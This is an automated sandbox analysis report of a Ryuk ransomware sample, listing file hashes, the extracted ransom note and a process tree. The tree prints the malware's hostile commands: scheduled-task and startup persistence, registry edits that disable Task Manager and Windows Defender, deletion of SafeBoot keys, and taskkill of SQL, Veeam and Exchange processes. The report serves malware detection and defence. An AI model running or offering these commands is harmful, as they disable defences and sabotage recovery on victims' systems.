Overview

overview

10

Static

static

be1b021843...5a.exe

windows7-x64

10

be1b021843...5a.exe

windows10-2004-x64

10

Resubmissions

07-11-2022 11:53

221107-n2tpwsedf5 10

07-11-2022 11:00

221107-m36keacfd7 10

Analysis

  • max time kernel
    155s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2022 11:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

  • Size

    885KB

  • MD5

    622bc38dee08e70e91e2be32a58b6d1f

  • SHA1

    7cfec4859fa7ca178095983b3f174f842a44b0c2

  • SHA256

    be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

  • SHA512

    176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

  • SSDEEP

    12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6

Score
10/10
ryukdiscoveryevasionransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

    ransomwareryuk
  • Disables Task Manager via registry modification
    evasion
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
    "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:1868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1632
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1500
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:1648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:560
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:912
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:1768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\system32\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
            PID:800
            • C:\Windows\system32\icacls.exe
              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              4⤵
              • Modifies file permissions
              PID:1784
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1508
          • C:\Windows\system32\cmd.exe
            cmd.exe /c taskkill /t /f /im sql*
            3⤵
              PID:1712
              • C:\Windows\system32\taskkill.exe
                taskkill /t /f /im sql*
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1776
            • C:\Windows\system32\taskkill.exe
              taskkill /f /t /im veeam*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1748
            • C:\Windows\system32\reg.exe
              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
              3⤵
                PID:1732
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
              2⤵
                PID:596
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                2⤵
                  PID:1760
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                  2⤵
                    PID:1504
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                    2⤵
                      PID:316
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                      2⤵
                        PID:832
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        2⤵
                          PID:1588
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            3⤵
                              PID:616
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1868
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1844
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                2⤵
                                  PID:1632
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    3⤵
                                      PID:1500
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:1976
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1648

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\RYUKID
                                      Filesize

                                      8B

                                      MD5

                                      21a792fdd72dd7ddf309bf7e3819ac8b

                                      SHA1

                                      54a61afa0a6bfd7e87588d1da5978dae8f7be290

                                      SHA256

                                      a62ba8e3eb83edbefc6a8051265a303b7a33e6b853616218c84a1ffa08441ab0

                                      SHA512

                                      6ff050424079b5ed78eb4771f7efa34665f9b81bc9c8c498bd5437dc95c84b0ce1f997566bf686fffd0a3b4ab9f83af0cd840abcd5d4b8384d17da1edac99f6a

                                      Download Submit

                                    • C:\ProgramData\RyukReadMe.txt
                                      Filesize

                                      1KB

                                      MD5

                                      fdb92b73b4370f248e57b5292cb4b507

                                      SHA1

                                      5d86a3818e4c38d4821372900f21f8ec62d97efc

                                      SHA256

                                      40f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477

                                      SHA512

                                      76b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9

                                      Download Submit

                                    • C:\ProgramData\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      566e76c377c6cbde155b8dbc2d4c0532

                                      SHA1

                                      e616a181764f0dec13cf7d1cc37f0e35bd5adbec

                                      SHA256

                                      d39a3de6f634ab642dd770313096a6c2de4cbc9b17b9d43220205463bac29fa2

                                      SHA512

                                      63c0b14bb3791a0adfc9050a9f4b3ce2227a8511f12bd4043dad79b3887655da61ac42e4a4a65e1d5f139a794dd8bb31054697e435aee377887415a3148397ed

                                      Download Submit

                                    • C:\ProgramData\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      566e76c377c6cbde155b8dbc2d4c0532

                                      SHA1

                                      e616a181764f0dec13cf7d1cc37f0e35bd5adbec

                                      SHA256

                                      d39a3de6f634ab642dd770313096a6c2de4cbc9b17b9d43220205463bac29fa2

                                      SHA512

                                      63c0b14bb3791a0adfc9050a9f4b3ce2227a8511f12bd4043dad79b3887655da61ac42e4a4a65e1d5f139a794dd8bb31054697e435aee377887415a3148397ed

                                      Download Submit

                                    • C:\ProgramData\hrmlog2
                                      Filesize

                                      292B

                                      MD5

                                      fb4f8969e391325a8b15c875e8a6f529

                                      SHA1

                                      8d2d1fee995be5da302f85c785d432cd290ebfe1

                                      SHA256

                                      5d4ac4057332a801f449ecab45c0ca7e6101891813106a29326f76b091b3e168

                                      SHA512

                                      57653dbf4a124c02d20ca981a2283b4f63d01ecc8c35048771a8275025cbaacd70000b5c7abec5d23802dfef92abb6c3aa203345c59f787b5034fe0fc0aea48a

                                      Download Submit

                                    • C:\ProgramData\ryuk.exe
                                      Filesize

                                      885KB

                                      MD5

                                      622bc38dee08e70e91e2be32a58b6d1f

                                      SHA1

                                      7cfec4859fa7ca178095983b3f174f842a44b0c2

                                      SHA256

                                      be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

                                      SHA512

                                      176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                      Filesize

                                      8B

                                      MD5

                                      21a792fdd72dd7ddf309bf7e3819ac8b

                                      SHA1

                                      54a61afa0a6bfd7e87588d1da5978dae8f7be290

                                      SHA256

                                      a62ba8e3eb83edbefc6a8051265a303b7a33e6b853616218c84a1ffa08441ab0

                                      SHA512

                                      6ff050424079b5ed78eb4771f7efa34665f9b81bc9c8c498bd5437dc95c84b0ce1f997566bf686fffd0a3b4ab9f83af0cd840abcd5d4b8384d17da1edac99f6a

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      566e76c377c6cbde155b8dbc2d4c0532

                                      SHA1

                                      e616a181764f0dec13cf7d1cc37f0e35bd5adbec

                                      SHA256

                                      d39a3de6f634ab642dd770313096a6c2de4cbc9b17b9d43220205463bac29fa2

                                      SHA512

                                      63c0b14bb3791a0adfc9050a9f4b3ce2227a8511f12bd4043dad79b3887655da61ac42e4a4a65e1d5f139a794dd8bb31054697e435aee377887415a3148397ed

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                      Filesize

                                      292B

                                      MD5

                                      fb4f8969e391325a8b15c875e8a6f529

                                      SHA1

                                      8d2d1fee995be5da302f85c785d432cd290ebfe1

                                      SHA256

                                      5d4ac4057332a801f449ecab45c0ca7e6101891813106a29326f76b091b3e168

                                      SHA512

                                      57653dbf4a124c02d20ca981a2283b4f63d01ecc8c35048771a8275025cbaacd70000b5c7abec5d23802dfef92abb6c3aa203345c59f787b5034fe0fc0aea48a

                                      Download Submit

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                      Filesize

                                      885KB

                                      MD5

                                      622bc38dee08e70e91e2be32a58b6d1f

                                      SHA1

                                      7cfec4859fa7ca178095983b3f174f842a44b0c2

                                      SHA256

                                      be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

                                      SHA512

                                      176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

                                      Download Submit

                                    • memory/1516-103-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmp

                                      Filesize

                                      8KB

                                      Download